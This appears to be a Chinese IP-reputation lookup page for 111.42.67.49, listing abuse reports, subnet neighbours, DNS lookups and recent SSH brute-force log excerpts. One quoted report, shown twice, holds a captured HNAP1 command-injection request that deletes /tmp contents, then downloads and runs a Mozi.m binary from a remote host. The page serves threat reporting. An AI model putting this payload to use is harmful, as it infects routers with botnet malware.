111.42.67.49 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): China Mobile Communications Corporation

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbotsspam	Fail2Ban Ban Triggered	2020-03-28 16:26:23

相同子网IP讨论:

IP	类型	评论内容	时间
111.42.67.31	attackspam	Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]	2020-04-14 23:25:30
111.42.67.77	attackspam	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 2020-04-06 12:23:14
111.42.67.72	attackbotsspam	suspicious action Thu, 27 Feb 2020 11:22:32 -0300	2020-02-28 03:23:14

类型

评论内容

时间

111.42.67.31

attackspam

Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]

2020-04-14 23:25:30

111.42.67.77

attackspam

POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
2020-04-06 12:23:14

111.42.67.72

attackbotsspam

suspicious action Thu, 27 Feb 2020 11:22:32 -0300

2020-02-28 03:23:14

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 111.42.67.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 9406
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;111.42.67.49.			IN	A

;; AUTHORITY SECTION:
.			227	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020032801 1800 900 604800 86400

;; Query time: 105 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 28 16:26:12 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

Host 49.67.42.111.in-addr.arpa not found: 2(SERVFAIL)

NSLOOKUP信息:

;; Got SERVFAIL reply from 100.100.2.138, trying next server
;; Got SERVFAIL reply from 100.100.2.138, trying next server
Server:		100.100.2.136
Address:	100.100.2.136#53

** server can't find 49.67.42.111.in-addr.arpa: SERVFAIL

最新评论:

IP	类型	评论内容	时间
51.91.212.80	attack	ET CINS Active Threat Intelligence Poor Reputation IP group 36 - port: 1025 proto: TCP cat: Misc Attack	2020-03-21 15:39:28
106.12.205.237	attackspambots	$f2bV_matches	2020-03-21 15:56:17
49.234.10.207	attack	Mar 21 09:16:07 server sshd\[23571\]: Invalid user domin from 49.234.10.207 Mar 21 09:16:07 server sshd\[23571\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.234.10.207 Mar 21 09:16:09 server sshd\[23571\]: Failed password for invalid user domin from 49.234.10.207 port 57428 ssh2 Mar 21 09:22:49 server sshd\[26232\]: Invalid user js from 49.234.10.207 Mar 21 09:22:49 server sshd\[26232\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.234.10.207 ...	2020-03-21 15:58:01
64.227.69.43	attackspambots	$f2bV_matches	2020-03-21 15:28:05
60.169.94.134	attackbots	2020-03-20 22:50:56 H=(k7dVyR) [60.169.94.134]:62378 I=[192.147.25.65]:25 F= rejected RCPT <2129823216@qq.com>: RBL: found in thrukfz5b56tq6xao6odgdyjrq.zen.dq.spamhaus.net (127.0.0.2, 127.0.0.11, 127.0.0.4, 127.0.0.3) (https://www.spamhaus.org/sbl/query/SBL468331) 2020-03-20 22:51:04 dovecot_login authenticator failed for (L4jh7QZ) [60.169.94.134]:62798 I=[192.147.25.65]:25: 535 Incorrect authentication data (set_id=hkcdtsradxes@lerctr.org) 2020-03-20 22:51:14 dovecot_login authenticator failed for (teZouEX) [60.169.94.134]:63677 I=[192.147.25.65]:25: 535 Incorrect authentication data (set_id=hkcdtsradxes@lerctr.org) ...	2020-03-21 15:43:17
24.165.25.22	attackbots	SSH Scan	2020-03-21 15:53:44
163.172.60.213	attackbots	Automatic report - XMLRPC Attack	2020-03-21 15:38:38
125.19.37.226	attackspambots	Mar 21 09:59:26 server sshd\[1899\]: Invalid user tharani from 125.19.37.226 Mar 21 09:59:26 server sshd\[1899\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.19.37.226 Mar 21 09:59:28 server sshd\[1899\]: Failed password for invalid user tharani from 125.19.37.226 port 53142 ssh2 Mar 21 10:12:31 server sshd\[5070\]: Invalid user parimag from 125.19.37.226 Mar 21 10:12:31 server sshd\[5070\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.19.37.226 ...	2020-03-21 16:02:08
222.186.31.166	attack	[MK-VM5] SSH login failed	2020-03-21 15:42:40
209.141.57.211	attackspambots	Mar 21 09:03:41 server sshd\[18728\]: Invalid user pass from 209.141.57.211 Mar 21 09:03:41 server sshd\[18728\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=209.141.57.211 Mar 21 09:03:43 server sshd\[18728\]: Failed password for invalid user pass from 209.141.57.211 port 57164 ssh2 Mar 21 09:08:34 server sshd\[19889\]: Invalid user news from 209.141.57.211 Mar 21 09:08:34 server sshd\[19889\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=209.141.57.211 ...	2020-03-21 15:44:58
120.92.93.12	attackbotsspam	Invalid user mattermos from 120.92.93.12 port 13134	2020-03-21 16:13:44
125.70.244.4	attackbots	Mar 21 06:35:26 ns382633 sshd\[30491\]: Invalid user jennelle from 125.70.244.4 port 58706 Mar 21 06:35:26 ns382633 sshd\[30491\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.70.244.4 Mar 21 06:35:28 ns382633 sshd\[30491\]: Failed password for invalid user jennelle from 125.70.244.4 port 58706 ssh2 Mar 21 07:18:38 ns382633 sshd\[5978\]: Invalid user fork1 from 125.70.244.4 port 47610 Mar 21 07:18:38 ns382633 sshd\[5978\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.70.244.4	2020-03-21 15:50:28
139.199.183.14	attackspambots	SSH brutforce	2020-03-21 15:33:52
46.136.173.103	attackspambots	Mar 21 01:40:26 ny01 sshd[22231]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.136.173.103 Mar 21 01:40:28 ny01 sshd[22231]: Failed password for invalid user sites from 46.136.173.103 port 40679 ssh2 Mar 21 01:44:53 ny01 sshd[24057]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.136.173.103	2020-03-21 16:07:47
51.254.37.192	attack	k+ssh-bruteforce	2020-03-21 15:26:42

最近上报的IP列表

171.110.117.223	190.103.181.209	39.89.150.34	103.57.222.223
1.1.245.72	183.88.2.169	180.244.233.221	95.178.216.37
52.80.191.249	171.249.41.135	187.110.235.70	162.243.133.15
74.131.51.86	202.82.149.243	54.43.247.135	156.231.38.66
106.116.118.111	14.18.92.6	144.91.118.152	142.44.247.115